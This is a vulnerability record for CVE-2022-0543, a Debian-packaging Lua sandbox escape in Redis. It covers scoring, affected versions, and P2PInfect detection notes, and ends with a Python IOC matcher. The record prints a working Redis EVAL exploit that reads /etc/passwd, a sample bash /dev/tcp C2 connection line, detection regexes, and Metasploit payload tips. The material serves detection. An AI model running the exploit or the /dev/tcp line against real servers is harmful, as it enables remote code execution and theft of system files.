CVE-2022-0543
published 2022-02-18


Priority: P1, score 98, critical
CVSS 3.1: 10 (AV:N / AC:L / PR:N / UI:N / S:C / C:H / I:H / A:H)
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability, due 2022-04-18
Exploited in the wild
EPSS: 99.67% (99.9th percentile)
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.

Affected (6 ranges)

Vendor | Product | Version range                 | Fixed in
debian | redis   | < redis 5:6.0.16-2 (bookworm) | redis 5:6.0.16-2 (bookworm)
debian | redis   |                               |
redis  | redis   | >= 0 < 5:6.0.16-1+deb11u2     | 5:6.0.16-1+deb11u2
redis  | redis   | >= 0 < 5:6.0.16-2             | 5:6.0.16-2
redis  | redis   | >= 0 < 5:6.0.16-2             | 5:6.0.16-2
redis  | redis   | >= 0 < 5:6.0.16-2             | 5:6.0.16-2

Detection & IOCs (extracted from sources)

port: 60100
url: GET /linux
path: /dev/tcp
command: eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /etc/passwd", "r"); local res = f:read("*a"); f:close(); return res' 0
port: 6380
filename: linux
filename: miner
filename: winminer
filename: windows
  • Monitor for outbound connections from Redis processes to port 60100, which is used by P2PInfect for P2P C2 communication after exploiting CVE-2022-0543.
  • Detect P2PInfect initial payload download by monitoring for plaintext HTTP GET requests to '/linux', '/miner', '/winminer', or '/windows' paths originating from Redis processes.
  • Monitor Redis processes for use of /dev/tcp for outbound network connections, which is a technique used in the P2PInfect exploit payload to connect to C2.
  • Detect P2PInfect MIPS variant propagation by monitoring for SFTP/SCP upload attempts of ELF binaries to SSH servers using weak credentials, and for attempts to install 'redis-server' via the OpenWRT package named 'redis-server'.
  • Hunt for P2PInfect evasion: monitor processes reading '/proc/self/status' for 'TracerPid' checks and system calls disabling Linux core dumps, which are anti-analysis techniques used by the latest P2PInfect variant.
  • The vulnerability only affects Redis on Debian and Ubuntu (and derived) distributions due to a packaging issue; scope detection should focus on these OS families.
  • The Nuclei template for CVE-2022-0543 uses a regex match for 'root:.*:0:0:' in the Redis EVAL response to confirm successful sandbox escape and RCE.
  • CVE-2022-0543 is NOT a Redis application vulnerability — it is a Debian/Ubuntu packaging issue with the Lua library. Redis instances on other distributions are not affected.
  • Staged Meterpreter payloads will fail on typical Debian/Ubuntu Redis deployments because of the 'MemoryDenyWriteExecute' systemd hardening setting; stageless payloads should be used for testing.
  • The Metasploit module only supports x86_64, though the vulnerability could in principle be exploited on i386, arm, ppc, etc.
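As an added example (not part of this record or of any vendor or project tooling), the following Python turns the detection notes above into a small matcher run over constructed host and Redis command-log events; the event schema, the `classify`/`scan` names and the sample values are assumptions made for the demonstration.

```python
import re

# Indicators from the detection notes above (P2PInfect activity after CVE-2022-0543).
P2P_C2_PORT = 60100
PAYLOAD_PATHS = {"/linux", "/miner", "/winminer", "/windows"}
# The Debian/Ubuntu sandbox-escape primitive: package.loadlib re-opening io/os from liblua5.1.
LOADLIB_RE = re.compile(
    r'package\.loadlib\s*\(\s*"[^"]*liblua5\.1[^"]*"\s*,\s*"luaopen_(?:io|os)"', re.I)
DEV_TCP_RE = re.compile(r"/dev/tcp/")

def classify(event):
    """Return the indicator names that fire for one event dict (assumed schema, keyed by
    "type": net -> proc,dst_port; http -> proc,method,path; exec -> proc,cmdline;
    redis -> cmd,script)."""
    hits = []
    kind = event.get("type")
    from_redis = event.get("proc", "").startswith("redis")
    if kind == "net" and from_redis and event.get("dst_port") == P2P_C2_PORT:
        hits.append("p2pinfect_c2_port")  # Redis talking outbound to the P2P C2 port
    if (kind == "http" and from_redis and event.get("method") == "GET"
            and event.get("path") in PAYLOAD_PATHS):
        hits.append("p2pinfect_payload_download")  # first-stage fetch by known path
    if kind == "exec" and from_redis and DEV_TCP_RE.search(event.get("cmdline", "")):
        hits.append("redis_spawned_dev_tcp")  # bash /dev/tcp connection from Redis
    if (kind == "redis" and event.get("cmd", "").upper() == "EVAL"
            and LOADLIB_RE.search(event.get("script", ""))):
        hits.append("lua_sandbox_escape_loadlib")  # CVE-2022-0543 primitive in EVAL
    return hits

def scan(events):
    """Return (event index, indicator) pairs for every indicator that fires."""
    return [(i, h) for i, e in enumerate(events) for h in classify(e)]

# Constructed sample events; 198.51.100.7 is a documentation address, not a real C2.
SAMPLE_EVENTS = [
    {"type": "net", "proc": "redis-server", "dst_port": 60100},
    {"type": "net", "proc": "redis-server", "dst_port": 6379},  # ordinary replication
    {"type": "http", "proc": "redis-server", "method": "GET", "path": "/linux"},
    {"type": "http", "proc": "curl", "method": "GET", "path": "/linux"},  # not Redis
    {"type": "exec", "proc": "redis-server",
     "cmdline": "bash -c 'exec 3<>/dev/tcp/198.51.100.7/60100'"},
    {"type": "redis", "cmd": "EVAL", "script":
     'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io")'},
    {"type": "redis", "cmd": "EVAL", "script": "return redis.call('GET', KEYS[1])"},
]

if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {hit}")
```

The two negative samples (replication traffic and a `curl` download) show the process-origin condition doing its job; only the four Redis-originated events fire.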

CVSS provenance

Source        | Version | Score | Severity | Vector
nvd           | v3.1    | 10.0  | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvd           | v2.0    | 10.0  | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C
osv           |         | 10.0  | CRITICAL |
vulncheck     |         | 10.0  | CRITICAL |
cisa          |         | 10.0  | CRITICAL |
vendor_debian |         | 10.0  | CRITICAL |